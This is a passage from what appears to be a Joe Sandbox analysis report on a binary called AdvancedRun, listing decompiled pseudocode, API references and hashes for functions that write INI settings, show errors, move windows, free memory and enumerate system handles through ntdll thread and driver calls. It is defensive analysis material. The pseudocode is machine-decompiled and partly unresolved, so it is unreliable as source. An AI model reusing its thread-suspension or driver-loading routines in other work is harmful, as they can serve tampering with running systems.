					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                  0x00409d5f
                                                                  0x00409d67
                                                                  0x00409d70
                                                                  0x00409ddb
                                                                  0x00409d72
                                                                  0x00409d74
                                                                  0x00409db2
                                                                  0x00409d84
                                                                  0x00409d84
                                                                  0x00409d8c
                                                                  0x00409d8d
                                                                  0x00409d98
                                                                  0x00409d9d
                                                                  0x00409d9e
                                                                  0x00409da6
                                                                  0x00409daf
                                                                  0x00409daf
                                                                  0x00409dc3
                                                                  0x00409dc3

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 00409DD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                  • String ID: "%s"
                                                                  • API String ID: 1343145685-3297466227
                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 38%
                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                  0x004047d2
                                                                  0x004047da
                                                                  0x004047e0
                                                                  0x004047e4
                                                                  0x004047ec
                                                                  0x004047ec
                                                                  0x004047f5
                                                                  0x00404800
                                                                  0x00404801
                                                                  0x00404802
                                                                  0x0040480d
                                                                  0x00404812
                                                                  0x00404813
                                                                  0x00404834

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                  • _snwprintf.MSVCRT ref: 00404813
                                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                  • String ID: Error$Error %d: %s
                                                                  • API String ID: 313946961-1552265934
                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                  0x004068ec
                                                                  0x004068f0
                                                                  0x004068f4
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x0040690a
                                                                  0x00406910
                                                                  0x00406911
                                                                  0x0040691b
                                                                  0x0040691e
                                                                  0x00406923
                                                                  0x0040692d
                                                                  0x0040692e
                                                                  0x00406933
                                                                  0x0040693d
                                                                  0x00406940
                                                                  0x00406949
                                                                  0x0040694a
                                                                  0x00406950
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695c
                                                                  0x00406964
                                                                  0x0040696d
                                                                  0x00406974
                                                                  0x0040697e
                                                                  0x00406989
                                                                  0x00406990
                                                                  0x00406998
                                                                  0x0040699b
                                                                  0x0040699f
                                                                  0x004069b8
                                                                  0x004069bc
                                                                  0x004069c4
                                                                  0x004069c7
                                                                  0x004069c7
                                                                  0x004069cb
                                                                  0x004069ce
                                                                  0x004069d4
                                                                  0x004069d4
                                                                  0x004069d9
                                                                  0x004069df
                                                                  0x004069e6
                                                                  0x004069ea
                                                                  0x004069ef
                                                                  0x004069f2
                                                                  0x004069f5
                                                                  0x00406a00
                                                                  0x00406a01
                                                                  0x00406a06
                                                                  0x00406a08
                                                                  0x00406a0b
                                                                  0x00406a10
                                                                  0x00406a16
                                                                  0x00406a25
                                                                  0x00406a25
                                                                  0x00406a18
                                                                  0x00406a1e
                                                                  0x00406a1e
                                                                  0x00406a27
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3b
                                                                  0x00406a41
                                                                  0x00406a47
                                                                  0x00406a4d
                                                                  0x00406a53
                                                                  0x00406a5d
                                                                  0x00406a6d

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                  • memcpy.MSVCRT ref: 0040696D
                                                                  • memcpy.MSVCRT ref: 0040697E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 975042529-0
                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 83%
                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                  0x004097b1
                                                                  0x004097b9
                                                                  0x004097bb
                                                                  0x004097be
                                                                  0x004097c3
                                                                  0x004097ca
                                                                  0x004097de
                                                                  0x004097de
                                                                  0x004097e3
                                                                  0x004097e5
                                                                  0x004097e5
                                                                  0x004097ec
                                                                  0x004097f3
                                                                  0x004097f6
                                                                  0x004097fe
                                                                  0x00409802
                                                                  0x00409805
                                                                  0x0040980a
                                                                  0x0040980d
                                                                  0x00409810
                                                                  0x00409822
                                                                  0x00000000
                                                                  0x00409827
                                                                  0x0040982a
                                                                  0x004098da
                                                                  0x004098da
                                                                  0x004098dc
                                                                  0x004098e0
                                                                  0x004098e9
                                                                  0x004098ec
                                                                  0x004098f6
                                                                  0x004098f6
                                                                  0x004098e2
                                                                  0x00000000
                                                                  0x004098e2
                                                                  0x00409830
                                                                  0x00409833
                                                                  0x00409838
                                                                  0x0040983b
                                                                  0x0040983e
                                                                  0x0040985f
                                                                  0x0040985f
                                                                  0x00409861
                                                                  0x00409863
                                                                  0x0040989e
                                                                  0x004098b1
                                                                  0x004098b8
                                                                  0x004098c0
                                                                  0x004098c5
                                                                  0x004098d5
                                                                  0x00409865
                                                                  0x00409865
                                                                  0x00409865
                                                                  0x0040986c
                                                                  0x00409878
                                                                  0x0040987f
                                                                  0x0040988a
                                                                  0x0040988f
                                                                  0x0040988f
                                                                  0x0040986c
                                                                  0x00000000
                                                                  0x00409863
                                                                  0x00409840
                                                                  0x00409843
                                                                  0x00409846
                                                                  0x0040984b
                                                                  0x00409852
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409854
                                                                  0x0040985d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040985d
                                                                  0x00409894
                                                                  0x00000000
                                                                  0x00409894

                                                                  APIs
                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                  • memset.MSVCRT ref: 00409805
                                                                  • memcpy.MSVCRT ref: 0040988A
                                                                  • memcpy.MSVCRT ref: 004098C0
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                  • String ID:
                                                                  • API String ID: 3641025914-0
                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067b5
                                                                  0x004067ba
                                                                  0x004067bf
                                                                  0x004067c1
                                                                  0x004067c6
                                                                  0x004067c7
                                                                  0x004067cc
                                                                  0x004067cd
                                                                  0x004067d2
                                                                  0x004067d4
                                                                  0x004067d9
                                                                  0x004067da
                                                                  0x004067df
                                                                  0x004067e0
                                                                  0x004067e5
                                                                  0x004067e7
                                                                  0x004067ec
                                                                  0x004067ed
                                                                  0x004067f2
                                                                  0x004067f3
                                                                  0x004067f8
                                                                  0x004067fa
                                                                  0x004067ff
                                                                  0x00406800
                                                                  0x00406805
                                                                  0x00406806
                                                                  0x00406808
                                                                  0x0040680f
                                                                  0x00406810
                                                                  0x00406812
                                                                  0x00406817
                                                                  0x0040681e
                                                                  0x00406828
                                                                  0x0040682b
                                                                  0x0040682c
                                                                  0x0040681e
                                                                  0x00406835
                                                                  0x00406839
                                                                  0x00406841

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$free
                                                                  • String ID:
                                                                  • API String ID: 2241099983-0
                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                  0x00405d03
                                                                  0x00405d06
                                                                  0x00405d10
                                                                  0x00405d17
                                                                  0x00405d22
                                                                  0x00405d32
                                                                  0x00405d40
                                                                  0x00405d48
                                                                  0x00405d4e
                                                                  0x00405d54
                                                                  0x00405d59
                                                                  0x00405d5c
                                                                  0x00405d61
                                                                  0x00405d67

                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                  • GetWindowRect.USER32 ref: 00405D17
                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                  • String ID:
                                                                  • API String ID: 4247780290-0
                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 89%
                                                                  			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                  0x004083dc
                                                                  0x004083e2
                                                                  0x004083e9
                                                                  0x004083ea
                                                                  0x004083eb
                                                                  0x004083f3
                                                                  0x004083f6
                                                                  0x004083f8
                                                                  0x00408401
                                                                  0x00408404
                                                                  0x00408407
                                                                  0x00408409
                                                                  0x0040840c
                                                                  0x00408413
                                                                  0x0040841d
                                                                  0x00408427
                                                                  0x0040842c
                                                                  0x0040842f
                                                                  0x00408432
                                                                  0x00408435
                                                                  0x00408438
                                                                  0x00408439
                                                                  0x0040843e
                                                                  0x0040843f
                                                                  0x00408442
                                                                  0x0040844a

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
